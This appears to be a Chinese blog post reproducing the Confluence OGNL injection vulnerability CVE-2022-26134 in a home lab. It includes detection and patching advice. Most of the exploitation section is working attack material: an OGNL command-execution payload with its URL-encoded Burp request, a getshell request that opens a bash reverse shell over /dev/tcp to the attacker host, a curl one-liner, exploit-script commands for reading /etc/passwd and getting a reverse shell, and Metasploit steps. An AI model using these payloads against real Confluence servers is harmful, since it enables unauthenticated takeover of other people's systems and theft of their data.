【CVE-2022-26134】Confluence OGNL RCE 漏洞

已于 2022-10-11 16:39:28 修改
阅读量7.8k 收藏 10
点赞数 3
文章标签: 安全 网络安全
于 2022-09-09 16:30:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45742777/article/details/126648493
版权

漏洞描述

远程攻击者在未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码。

影响版本

Confluence Server and Data Center >= 1.3.0

Confluence Server and Data Center < 7.4.17

Confluence Server and Data Center < 7.13.7

Confluence Server and Data Center < 7.14.3

Confluence Server and Data Center < 7.15.2

Confluence Server and Data Center < 7.16.4

Confluence Server and Data Center < 7.17.4

Confluence Server and Data Center < 7.18.1

背景知识

confluence

Atlassian Confluence(简称Confluence)是一个专业的wiki程序。它是一个知识管理的工具,通过它可以实现团队成员之间的协作和知识共享。团队将日常的工作任务进度管理、技术知识分享、开发文档、操作手册、文档附件都放置入Confluence中进行统一管理,富文本编辑器使文档内容支持更加丰富。

主要使用场景

目前,Confluence被用于广泛地用于项目团队,开发团队,市场销售团队。

漏洞危害

漏洞评分9.8,危害等级严重,攻击者可以利用此漏洞执行任意代码,直接获得权限。

漏洞原理

攻击者提供的URI将被转换为namespace,然后该namespace将被转换为OGNL表达式进行计算(攻击者提供的url被间接转化成了OGNL表达式进行计算)

OGNL

OGNL是一种功能强大的表达式语言,可以存取对象的任意属性,调用对象的方法,遍历整个对象的结构图,实现字段类型转化等功能。它使用相同的表达式去存取对象的属性。

OGNL常用表达式

1、当使用OGNL调用静态方法的时候,需要按照如下语法编写表达式:

@package.classname@methodname(parameter)

2、对于OGNL来说,java.lang.Math是其的默认类,如果调用java.lang.Math的静态方法时,无需指定类的名字,比如:@@min(4, 10);

环境搭建

目标机:Ubunut 192.168.164.129

攻击机:Kali 192.168.164.128

docker-compose up -d

环境搭建后访问192.169.164.129:8090即可访问页面

 进入后的页面

 漏洞验证与利用

1、BurpSuite

poc构造

${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

使用URL转换

%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D

 数据包如下(不可复制)

GET //%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
Host: 192.168.164.129:9080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=3764D915B037D5A50D8025AA793E990A
Connection: close

 getshell

GET //%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.164.128/9898%200%3E%261%27%29.start%28%29%22%29%7D/ HTTP/1.1

%2F%2F%24%7Bnew+javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new+java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.164.128%2F9898+0%3E%261%27%29.start%28%29%22%29%7D%2F

2、CURL

curl -v http://192.168.164.129:8090//%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/

 3、EXP利用

 python3 CVE-2022-26134.py -h #帮助

python3 CVE-2022-26134.py --rhost 192.168.164.129 --rport 8090 --lhost 192.168.164.128 --protocol http:// --read-file /etc/passwd #读取文件

python3 CVE-2022-26134.py --rhost 192.168.164.129 --rport 8090 --lhost 192.168.164.128 --protocol http:// --reverse-shell #获取shell

 不太好使

4、MSF

search 26134

set rhosts 192.168.164.129
set lhost 192.168.164.128
run

 

 漏洞检测

1、版本检测

在登录界面以及Confluence主界面都能看到版本号,对应版本号可能会存在相关漏洞。

2、手动检测

利用BurpSuite或者是curl手动检测

3、脚本检测

支持单个url检测以及批量url检测。

 Fofa语句

还是别乱搞了吧

漏洞修复

  1. 升级Atlassian Confluence Server and Data Center至安全版本。
  2. 下载官方发布的xwork-1.0.3-atlassian-10.jar替换confluence/WEB-INF/lib/目录下原来的xwork jar文件,并重启Confluence。
  3. 拦截请求参数中包含"getRuntime().exec("或"/etc/passwd"的流量。
     

注:漏洞脚本非原创

晓风残月sk
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE -2022-26134漏洞复现(Confluence OGNL 注入rce漏洞)
qq_17754023的博客
06-04 5082
Atlassian ConfluenceAtlassian Confluence是一个专业的企业知识管理与协同软件,主要用于公司内员工创建知识库并建立知识管理流程,也可以用于构建企业wiki。其使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。因此,该系统被国内较多知名互联网企业所采用,应用范围较广,因此该漏洞威胁影响范围较大。 0x02 漏洞概述Atlassian Confluence存在远程代码执行漏洞,攻击者可以利用该漏洞直接获取目标系统权限。...
CVE-2022-26134 Confluence 无文件落地的内存马注入姿势
qq_40466372的博客
07-06 5553
CVE-2022-26134 Confluence 无文件落地的内存马注入
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134)复现
weixin_42489549的博客
06-29 8595
CVE-2022-26134 Confluence远程命令执行漏洞复现
confluence的几个高危漏洞复现
fly夏天的博客
12-06 3765
CVE-2021-26084 CVE-2022-26134 漏洞复现
ATLASSIAN CONFLUENCE 远程代码执行漏洞CVE-2022-26134漏洞复现
Websec
06-07 1110
近日,Atlassian官方发布了Confluence Server和Data Center OGNL 注入漏洞CVE-2022-26134)的安全公告,远程攻击者在未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码,CVSS评分为10。目前该漏洞细节与PoC已被公开披露,且被检测到存在在野利用。请相关用户尽快采取措施进行防护。Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一
CVE-2022-26134 Confluence OGNL 注入复现及后利用
Love&Share
04-07 2549
Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新,通告了一个严重且已在野利用的代码执行漏洞,攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令攻击者提供的URI将被转换为namespace,然后该namespace将被转换为OGNL表达式进行计算(攻击者提供的url被间接转化成了OGNL表达式进行计算)
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
春秋云境 CVE-2022-4230 夺旗
最新发布
05-02
**CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时没有进行充分的数据转义,从而导致SQL注入攻击成为可能。具体来说: ...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
CVE-2022-26134 Confluence远程命令执行漏洞复现
weixin_48421613的博客
06-05 6047
CVE-2022-26134 Confluence远程命令执行漏洞复现
漏洞复现】Atlassian Confluence(CVE-2022-26134)OGNL远程代码执行
做自己喜欢的事,并将其发挥到极致!
06-06 2159
本篇文章所涉及技术与工具仅用于技术研究、漏洞复现,切勿用于非法渗透攻击行为,造成任何后果与本作者无关,切记!!!Atlassian Confluence 是一款各企业广泛使用的 wiki 系统。在上存在OGNL 注入漏洞,恶意攻击者可以利用该漏洞在目标Atlassian Confluence Server and Data Center服务器上注入恶意ONGL表达式 ,造成远程代码执行。......
Atlassian Confluence 远程代码执行 CVE-2022-26134漏洞复现
m0_60635609的博客
04-07 947
Atlassian Confluence是Atlassian公司出品的专业wiki程序。攻击者可利用漏洞在未经身份验证的情况下,远程构造OGNL表达式进行注入,在Confluence Server或Data Center上执行任意代码。请相关用户尽快自检并采取措施进行防护。(Confluence还有个RCE,为了好区分,我习惯把是CVE-2021-26084这个叫OGNL表达式注入命令执行漏洞,在后续的文章,我也会复现CVE-2021-26084)
Confluence 未授权漏洞分析(CVE-2023-22515)
hackzkaq的博客
11-28 1060
在处理完上述工作后,Struts2 就会调用拦截器链中的拦截器,这些拦截器会根据用户请求参数值去更新 ValueStack 对象顶层节点的相应属性的值,最后会传到 Action 对象,并将 ValueStack 对象中的属性值,赋给 Action 类的相应属性。总的来说, 因为 方法的一些逻辑问题, 导致这个类自身对传入参数的过滤并没有生效, 我们最终还是可以通过 的形式去调用当前 action 的 getter / setter, 并不需要关心方法本身或者它的 returnType 是否使用了 注解。
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134)风险通告及POC复现
qq_18209847的博客
06-07 2988
信息安全部监测到Atlassian Confluence Server and Data Center (CVE-2022-26134)远程代码执行漏洞
漏洞分析】Confluence 数据中心和服务器中的严重漏洞 CVE-2023-22515
网络安全知识分享
03-21 1300
Confluence 的开发者 Atlassian 已公告此漏洞,并将其归类为损坏的访问控制问题。他们强调需要立即采取行动,并建议用户升级到最新版本以保护他们的系统。Atlassian 将该漏洞的严重级别评定为 Critical CVSS 10。
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134漏洞复现
网安君的博客
06-07 2787
本文章仅供学习和研究使用,严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。CVE-2022-26134漏洞是一个严重的未经身份验证的远程代码执行漏洞,通过 OGNL 注入利用并影响 1.3.0 版之后的所有 Atlassian Confluence 和 Data Center 2016 服务器。成功利用允许未经身份验证的远程攻击者创建新的管理员帐户、执行命令并最终接管服务器。1.3.0 ..
CVE-2022-26134的poc
04-20
很抱歉,我无法提供CVE-2022-26134的POC(Proof of Concept)或相关信息。CVE-2022-26134是一个真实存在的漏洞编号,但我无法直接提供具体的POC。CVE-2022-26134是由CVE(Common Vulnerabilities and Exposures)组织分配的标识符,用于标识和跟踪已公开的安全漏洞。 如果您对CVE-2022-26134感兴趣,建议您查阅相关的安全公告、漏洞报告或专业安全研究机构的信息。这些资源通常会提供有关漏洞的详细描述、影响范围、修复建议等信息。 如果您有其他关于安全漏洞网络安全或其他技术问题,我会尽力提供帮助。请告诉我您还有其他问题或需要了解的内容。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值